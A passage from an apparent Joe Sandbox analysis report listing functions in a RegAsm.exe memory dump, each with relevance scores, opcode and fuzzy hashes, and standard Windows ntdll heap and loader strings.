                                • Instruction Fuzzy Hash: 04A18C319002299BDB24CF65D888BA9B3B5BF98318F1541EADC48AB351D730DEC0CF96
                                Function 02C1F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                • API String ID: 0-2586055223
                                • Opcode ID: 7c711ff9532f8e51c30ad3da6a4b21ceb6b6cec479b531fa8d564714eaad56fb
                                • Instruction ID: ca6a10b77f4a9e681f249f1bb5e69c178d058c9d7cae08203a95b4e8549483ca
                                • Opcode Fuzzy Hash: 7c711ff9532f8e51c30ad3da6a4b21ceb6b6cec479b531fa8d564714eaad56fb
                                • Instruction Fuzzy Hash: 3B6147322047809FE722DF68D845F2777E9FF85714F0408A8F9958B691C734E941EB62
                                Function 02CD11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                • API String ID: 0-336120773
                                • Opcode ID: 5d3750f5bb2680a6bb3be5be7d50a1434b9d29c1695e76673563ee3934130d70
                                • Instruction ID: 4c5f2dd5e37bc7ef907b253f86a10a3b4fe2c632e8aa65ad8c7ed28412671e0f
                                • Opcode Fuzzy Hash: 5d3750f5bb2680a6bb3be5be7d50a1434b9d29c1695e76673563ee3934130d70
                                • Instruction Fuzzy Hash: C6312431210110EFE710DB98C885F6673E9EF49768F190555F64ACB290D7B2ED40EF65
                                Function 02C19148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 0-1391187441
                                • Opcode ID: b344a470973597330000bc36730fc69f78d22e0171aa1ec85a0eb2597cd1e9cf
                                • Instruction ID: f05e8ddda6f8e414b7b7b8582b73cde26825087b865e96aac89097aa6e69b2f6
                                • Opcode Fuzzy Hash: b344a470973597330000bc36730fc69f78d22e0171aa1ec85a0eb2597cd1e9cf
                                • Instruction Fuzzy Hash: 4331D236640104EFDB11DB49CC8AFAAB7F9EF46738F244161E915A7290D770ED81DE60
                                Function 02CC94E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $ $0
                                • API String ID: 0-3352262554
                                • Opcode ID: 049f9f171786891d3811901578370587602038664f06e78f1e77ccd1bfa6748d
                                • Instruction ID: f34b8d18091d9d10db03cde192c4b5b96f9a7d1a6cf9ea8ce0a88716eda68dd2
                                • Opcode Fuzzy Hash: 049f9f171786891d3811901578370587602038664f06e78f1e77ccd1bfa6748d
                                • Instruction Fuzzy Hash: 603212B16083819FD320CF69C494BABBBE5BBC8308F24492EF59987350D775E949CB52
                                Function 02C30770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: 11679a2caaacc023ec04b16b21fd50e2aacec9bbe7fa969fa4bb1bed8bca9e81
                                • Instruction ID: d4d393f026b1a004a3ed384e03672fbc54e526a58bd484a40eb3d175f5d5c01e
                                • Opcode Fuzzy Hash: 11679a2caaacc023ec04b16b21fd50e2aacec9bbe7fa969fa4bb1bed8bca9e81
                                • Instruction Fuzzy Hash: 2AF1CE31A00605DFDB26DF69C884B6AB7F6FF84308F1485A8E4069B381D774EA81CF91
                                Function 02C2B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                • API String ID: 0-1145731471
                                • Opcode ID: 2ea1a3b64297080b1d74bb2de0106938e56858e2ec43fceb1e6cf91cf0acd034
                                • Instruction ID: f0d4f6d6e3332cf7b8775d7dc95993bd86a28f5936f18152c7148df27eb04275
                                • Opcode Fuzzy Hash: 2ea1a3b64297080b1d74bb2de0106938e56858e2ec43fceb1e6cf91cf0acd034
                                • Instruction Fuzzy Hash: 5CB1CF31A047948FCB25DF59C980BADB7B6AF84B0CF14856AE851EB380DB34ED44CB51
                                Function 02CA368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                • Opcode ID: 0dbc87ad47ab4a824ac7244e1be3369469ce52aa4cdc8b490f3bcab9b210819e
                                • Instruction ID: 49cbc51209bac6e6ed317de5e51aba0bac0b70fbd3b4fc1fa5494e896a034180
                                • Opcode Fuzzy Hash: 0dbc87ad47ab4a824ac7244e1be3369469ce52aa4cdc8b490f3bcab9b210819e
                                • Instruction Fuzzy Hash: 35B1D571644382AFD311DF54C8A4F67B7E8FB84718F00496AFA4197280D774ED45CB92
                                Function 02C1A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: FilterFullPath$UseFilter$\??\
                                • API String ID: 0-2779062949
                                • Opcode ID: 7b5164c570c557910839ccccdce4d6744836be3eab349b889d75c4b44bb6672b
                                • Instruction ID: 048629df4d3b5d0f4ad29c60e6c18f620f0bee5107448718d522003d248b96a9
                                • Opcode Fuzzy Hash: 7b5164c570c557910839ccccdce4d6744836be3eab349b889d75c4b44bb6672b
                                • Instruction Fuzzy Hash: B9A1677190162A9BDB219B64CC88BEAB7B9EF88704F1001EAE90DA7250D7359FC5CF54
                                Function 02CB36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                • Opcode ID: 43f12a65bb9ec04296492c346a04ef14cb97b346f6e5f565b691c2b4b1ec2864
                                • Instruction ID: 7b8504ce208905d261c3e17395af6b19df60e9e9a91dc89e18da734d7f6a4b28
                                • Opcode Fuzzy Hash: 43f12a65bb9ec04296492c346a04ef14cb97b346f6e5f565b691c2b4b1ec2864
                                • Instruction Fuzzy Hash: 1981BE71608381AFD712DB15C984FAAB7E9EF84754F0409ADFD80AB390D775E904CBA2
                                Function 02C5909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: %$&$@
                                • API String ID: 0-1537733988
                                • Opcode ID: 1f95d3867e2206b0d20f7210ec1f6360e3741511e956c31dde61294db1eb0397
                                • Instruction ID: 4a40d084bfdb776a9b49f1e1f90d2d18466a5cb11f485e4919f864a5ef439009
                                • Opcode Fuzzy Hash: 1f95d3867e2206b0d20f7210ec1f6360e3741511e956c31dde61294db1eb0397
                                • Instruction Fuzzy Hash: 5E71CE70608711DFCB14DF24C984A2BBBE6BFC8718F10895DE89A47291C730DA85CF9A
                                Function 02CFB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                • GlobalizationUserSettings, xrefs: 02CFB834
                                • TargetNtPath, xrefs: 02CFB82F
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02CFB82A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                • Opcode ID: a2398ec2d9cb80396568a146336eceb97ed5df1e42016c965e3ec54bb91e5698
                                • Instruction ID: a0cbe3dc23a30617541cb0fba3a2b80ef280f7c9e2ec4e5703e592b5c41df837
                                • Opcode Fuzzy Hash: a2398ec2d9cb80396568a146336eceb97ed5df1e42016c965e3ec54bb91e5698
                                • Instruction Fuzzy Hash: 05617272D41629ABDBA1DF54DC88BD9B7B9AF08758F0101E5EA08A7250CB74DF84CF90
                                Function 02C1F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: , xrefs: 02C7E6B3
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02C7E6C6
                                • HEAP[%wZ]: , xrefs: 02C7E6A6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                • Opcode ID: 85115b9551ba7548d738ffdecb4367058e7aedeced31807a277dfb6382dd1545
                                • Instruction ID: 021a0b23135067d600f0f8b9ccab7765895ce5979440a2b3f84a216cba87bb4f
                                • Opcode Fuzzy Hash: 85115b9551ba7548d738ffdecb4367058e7aedeced31807a277dfb6382dd1545
                                • Instruction Fuzzy Hash: 7E512A31600784EFE712DB68C845F66BBF9FF46704F1440A4E541CB692D374EA41EB50
                                Function 02C516CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                Download Yara Rule
                                Strings
                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02C91B39
                                • minkernel\ntdll\ldrtls.c, xrefs: 02C91B4A
                                • LdrpAllocateTls, xrefs: 02C91B40
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-4274184382
                                • Opcode ID: ce0f50cfcf4dbf1d98fa9e7eaea929b35125512d442159c6e6fa3104ac81ff87
                                • Instruction ID: 87419cda58b651b1b5da9c945fe8a6cb6c2f6128ad165118084d0591fa0b9ed1
                                • Opcode Fuzzy Hash: ce0f50cfcf4dbf1d98fa9e7eaea929b35125512d442159c6e6fa3104ac81ff87
                                • Instruction Fuzzy Hash: AE41AA75E40605AFDB15CFA8C885BAEBBF6FF88344F084519E809A7300DBB4A940DF90
                                Function 02CDC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                Download Yara Rule
                                Strings
                                • PreferredUILanguages, xrefs: 02CDC212
                                • @, xrefs: 02CDC1F1
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02CDC1C5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                • API String ID: 0-2968386058
                                • Opcode ID: b6fd47dda967ea052a8cf8ac4f6593d4dc6e0291b0c953a8cf912c5bbc51062f
                                • Instruction ID: 83d1c57b819a7c8643b5828b0f4c720c9ec281752066b0d160989f73fa4acced
                                • Opcode Fuzzy Hash: b6fd47dda967ea052a8cf8ac4f6593d4dc6e0291b0c953a8cf912c5bbc51062f
                                • Instruction Fuzzy Hash: DF416D72E0020AEBDB11DAD4C885FEEB7BAAB54B04F14416BEA05B7280D7749B44DB90
                                Function 02CB4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                • API String ID: 0-1373925480
                                • Opcode ID: dc68d0d3835831f8e6084ebe725abb89a1ebba919468bcae7104343b538721f6
                                • Instruction ID: 0ddda238c12b43a7b813614d4efe908fb023e6ca87a34347f80fe20712aa18f3
                                • Opcode Fuzzy Hash: dc68d0d3835831f8e6084ebe725abb89a1ebba919468bcae7104343b538721f6
                                • Instruction Fuzzy Hash: CC412131D086988BEB3ADB95C860BEDB7B9EF85344F1404A9D801FB382D7348A01DB51
                                Function 02CA4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02CA4888
                                • minkernel\ntdll\ldrredirect.c, xrefs: 02CA4899
                                • LdrpCheckRedirection, xrefs: 02CA488F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-3154609507
                                • Opcode ID: 2bca4cdce1f496bf6019e6d384a40d2287046d214983238d536bc5bf7cc76137
                                • Instruction ID: 603bae0e703f7b36c56420b2191fe486a187e65cca9b9a6972079d807e01cad4
                                • Opcode Fuzzy Hash: 2bca4cdce1f496bf6019e6d384a40d2287046d214983238d536bc5bf7cc76137
                                • Instruction Fuzzy Hash: 7F41D432A003D29FCB39CE59E860A26B7E5EF89B58F050569EC45D7311D7B0DD01CB91
                                Function 02C533A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                • RtlCreateActivationContext, xrefs: 02C929F9
                                • SXS: %s() passed the empty activation context data, xrefs: 02C929FE
                                • Actx , xrefs: 02C533AC
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                • Opcode ID: 804bd7e916cac6a8bf3f739b55d0a06f4ef16f2b801ec66c20452665429e26fe
                                • Instruction ID: 61e931bb315dc1bad5830a2883303247b6901da96c32e0f039de5c3676c29754
                                • Opcode Fuzzy Hash: 804bd7e916cac6a8bf3f739b55d0a06f4ef16f2b801ec66c20452665429e26fe
                                • Instruction Fuzzy Hash: 09314433640395AFEF26DF58C884B967BA5EB84764F0584A9ED05DF281CB30ED81CB90
                                Function 02C51607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                Strings
                                • minkernel\ntdll\ldrtls.c, xrefs: 02C91A51
                                • DLL "%wZ" has TLS information at %p, xrefs: 02C91A40
                                • LdrpInitializeTls, xrefs: 02C91A47
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-931879808
                                • Opcode ID: f6bd498871645f4116e7b9124088058c011c43b1b043c50d107412bf3c68e558
                                • Instruction ID: 06677229619139632864e99c741768486e6ebf953e25806cdae24f9e62758be3
                                • Opcode Fuzzy Hash: f6bd498871645f4116e7b9124088058c011c43b1b043c50d107412bf3c68e558
                                • Instruction Fuzzy Hash: D3314B31A40210FBEB108F49D889F6A73E9EB80744F480469E90967680DBF4EE81C754
                                Function 02C61270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                • BuildLabEx, xrefs: 02C6130F
                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02C6127B
                                • @, xrefs: 02C612A5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-3051831665
                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction ID: d108a9ac3b05e090add84b71e0d046b7c031ad22fa783c46a0e5588d715c0e28
                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction Fuzzy Hash: 1431CF72900519AFCF11AFA6CC88EEEBBBEEF84754F044025E909A7260D770DA45DB90
                                Function 02CA20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                Download Yara Rule
                                Strings
                                • Process initialization failed with status 0x%08lx, xrefs: 02CA20F3
                                • minkernel\ntdll\ldrinit.c, xrefs: 02CA2104
                                • LdrpInitializationFailure, xrefs: 02CA20FA
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2986994758
                                • Opcode ID: 24b7a1c2d3c0fbe4a7819718f89e4d8bbf136a2d05f181ba6d39c548fca49d92
                                • Instruction ID: 51c11797104bc67c0234c8a89096019e06f04a8c2645672f0ad8272ba6ce3aa8
                                • Opcode Fuzzy Hash: 24b7a1c2d3c0fbe4a7819718f89e4d8bbf136a2d05f181ba6d39c548fca49d92
                                • Instruction Fuzzy Hash: 27F02831A802197BE724D64CDC96F95376DEB81B4CF400069FF00776C0D6B0AE00CA42
                                Function 02C303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: #%u
                                • API String ID: 48624451-232158463
                                • Opcode ID: 8ae4ab3770ac75b8650959c5bc1b066906c42edc1fb6bdecab3cbc1e4eefa2ec
                                • Instruction ID: 0e8ffde1cc06330ce520e92cff95f413a0300626baa664b5f00ccd203624762d
                                • Opcode Fuzzy Hash: 8ae4ab3770ac75b8650959c5bc1b066906c42edc1fb6bdecab3cbc1e4eefa2ec
                                • Instruction Fuzzy Hash: EA716C72A0014A9FDB15DFA8C995BAEB7F9FF48348F144465E901E7251EB34EE01CBA0
                                Function 02C352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                • Opcode ID: bc2e8e086fc7a6503b90672b8a13e9c1645a97e76924dd62622e448b96c600eb
                                • Instruction ID: 28fa006c33b9a6a4243f5d37d6274781e38d0f7ae4ca2dc68727bca82b854b03
                                • Opcode Fuzzy Hash: bc2e8e086fc7a6503b90672b8a13e9c1645a97e76924dd62622e448b96c600eb
                                • Instruction Fuzzy Hash: 28328B705083518BC7259F19C484B7EB7F5EFC9788F94892EF9859B290E734DA80CB92
                                Function 02CEA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: `$`
                                • API String ID: 0-197956300
                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction ID: 68e1dd49f29d6da32c3b6dc7fcc866810178477e9183f345ac7fce91efef035a
                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction Fuzzy Hash: A8C1D0722043419FDB24CF29C845B6BBBE6AFC4318F184A2DF996CA290D774D645CB92
                                Function 02C9E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Legacy$UEFI
                                • API String ID: 2994545307-634100481
                                • Opcode ID: 8af9bd006e0dc3e2e83ceaa1d1805a751d5761c60f1c7601ebbe5205c131ca92
                                • Instruction ID: 1d2dccb0460ada2f4bc3d0c542fa8ec12ef13770a7159da3e4f1403751e4ce98
                                • Opcode Fuzzy Hash: 8af9bd006e0dc3e2e83ceaa1d1805a751d5761c60f1c7601ebbe5205c131ca92
                                • Instruction Fuzzy Hash: FB616E71E006189FDF24DFA9C888BAEBBB5FF58704F14406EE649EB291D731A940CB54
                                Function 02C3F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$$
                                • API String ID: 0-233714265
                                • Opcode ID: 9b14e938329dca3168c0bd4871962d0fe354fcc3ba5f2255b82cccb63228dbdc
                                • Instruction ID: 77319d83ab9f758bc1ebb023151f7950202e44100271e6a20864e1460fd17a90
                                • Opcode Fuzzy Hash: 9b14e938329dca3168c0bd4871962d0fe354fcc3ba5f2255b82cccb63228dbdc
                                • Instruction Fuzzy Hash: 7361CD71E00789DBDB26DFA4D580BADB7B2BF84308F144C2DD506ABB40CB74AA45DB91
                                Function 02C204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                Download Yara Rule
                                Strings
                                • kLsE, xrefs: 02C20540
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02C2063D
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 0-2547482624
                                • Opcode ID: b56d828422acd667fe4acea55faeb0584bc05900217d071dbf45f2bc14f0d0a2
                                • Instruction ID: 203d6305417aa14da6088ef827b6fcf747728cab3a5cf6fc6b0024e32d799670
                                • Opcode Fuzzy Hash: b56d828422acd667fe4acea55faeb0584bc05900217d071dbf45f2bc14f0d0a2
                                • Instruction Fuzzy Hash: 6951BD715147629FC724DF68C5447A7B7E8AFD4704F00483EE99A87240EB70D649CF96
                                Function 02C2A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                Download Yara Rule
                                Strings
                                • RtlpResUltimateFallbackInfo Enter, xrefs: 02C2A2FB
                                • RtlpResUltimateFallbackInfo Exit, xrefs: 02C2A309
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                • API String ID: 0-2876891731
                                • Opcode ID: 9c3a8dec4ccd4350bca0902967a0963294255ecc3bec3d81a96e1103d2c4fc10
                                • Instruction ID: f14e76235dede15fa0f1f6e1f79fe510c507aed6be10d09ea2f87dea8e364472
                                • Opcode Fuzzy Hash: 9c3a8dec4ccd4350bca0902967a0963294255ecc3bec3d81a96e1103d2c4fc10
                                • Instruction Fuzzy Hash: A041D131A016A9DBCB21DF69C944B6E77F4FF84718F1480A9EC05DB251EB35DA04CB51
                                Function 02C5329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                • Opcode ID: 8c1b97ced234a2e77810cb84f68bb6d9cada8d86fd20f5fe9a38c3616c0fe2f1
                                • Instruction ID: 2de3d53108092e3939fec8131fc7b4ce054573e34b4bdadb800f7f8025f9de69
                                • Opcode Fuzzy Hash: 8c1b97ced234a2e77810cb84f68bb6d9cada8d86fd20f5fe9a38c3616c0fe2f1
                                • Instruction Fuzzy Hash: 4F31B272508794AFC311DF29C484A6BBBE8EBC4794F40096EF99983210DB30DD46DB96
                                Function 02C2C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
